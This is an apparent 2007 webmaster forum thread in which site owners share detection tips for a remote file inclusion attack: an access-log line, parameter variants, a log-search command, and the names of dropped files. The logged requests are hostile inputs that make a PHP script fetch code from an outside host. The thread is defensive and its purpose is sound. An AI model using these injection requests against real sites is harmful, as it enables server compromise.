Hmm. Well, if the mods cannot allow *any* IP, and to try and give something for folks to search their logs for, here is the access_log entry with the IPs obscured instead:

<access-IP-obscured> - - [09/Apr/2007:12:37:44 +0100] "GET /help/test.php?stats=http://<root-kit-IP-obscured>/img/dog.c? HTTP/1.1" 404 18 "-" "libwww-perl/5.64" In:- Out:-:-pct.

If you have command-line access, the following will pick out all access-lines:

fgrep "img/dog.c" access_log ¦ less

(remember to convert the `¦' [pipe-character] to an *actual* pipe-character)

Other variants used on the above are:

GET /help/test.php?test=http:...
GET /help/test.php?help=http:...
GET /help/index.php?null=http:...
GET /help/test.php?a=http:...
GET /help/test.php?from=http:...
GET /help/test.php?action=http:

I've had 11 different IPs attempting this hack between 09/Apr/2007:12:37:44 and 10/Apr/2007:12:25:38. The <root-kit-IP-obscured> is identical in all cases. From the lang in dog.c it is written by a Brazilian hacker. If you need the IP, there is an entry within my own Forums ("Site Info & Diary").

HTH.

I've just thought of something else practical that folks can do to check out their server.

The hack-script (if successful, of course) would have attempted to drop a file onto the server. The file to locate is:

shmop.so
or
shmop.dll

(I am less sure of the name of the second one, as it was aimed at Windows servers, so did not apply to myself. It was definitely a `.dll', but may have been a slightly different name.)

It's funny, I have my pc locked down so tight I cannot even retrieve the source code without my tools throwing it into quarantine. I'm not so sure I want to let the guard down long enough to investigate the code ;)

What did you discover about the file?

Also, did you happen to check out the browser vulnerability [webmasterworld.com] I recently posted?

coopster:

What did you discover about the file?

The file is no longer on my PC, and I did not spend more than 30 secs or so glancing through the code (I am more sensitive to the intention of what is said or written than the meat 'n' veg of it; looking at this code caused me deep repulsion, very similar to the feelings in the stomach that you get when smelling fresh vomit) so please bear all that in mind in what follows.

In spite of the name of the source-file (dog.c), what comes down is a very standard HTML page (either 4.01, or possibly xhtml transitional). There are PHP statements embedded, and a very large slab of Javascript. It seeks to either drop some more files from the same IP on the server (browser computer?) or, if already present, make use of them. I did notice that it was designed to discriminate between Linux and Windows machines. My best guess (only 30 secs remember) was key-logging or some such.

recently one of our site based on wordpress was attacked by a virus and a block of strange javascript was added to all html pages..

I am wondering if it was also attacked by this hack-script? I have a VPS how can I check it?

thanks

phparion:

I have a VPS how can I check it?

Search through the access_logs for the text-string "img/dog.c" (no quotes). Also, check out msg#3308500 above.

If you want to find the IP on my site forums, look for "<IP-Number> blocked at the Firewall".

I have between 10 and 300 hacking attempts a day on one site from hundreds of different IPs. The user agent is mostly libwww-perl/5.#*$! or Mozilla/5.0. The scripts are mostly located in hidden directories of hundreds of sites.
The names of the scripts are numerous (mostly php and perl scripts) : dog.c, sweet.c , muerte.htm, cmd.txt, include.gif, r.jpg, list.txt, cmd.gif and so on.
At the moment, 60 page names with 100 variables have been requested.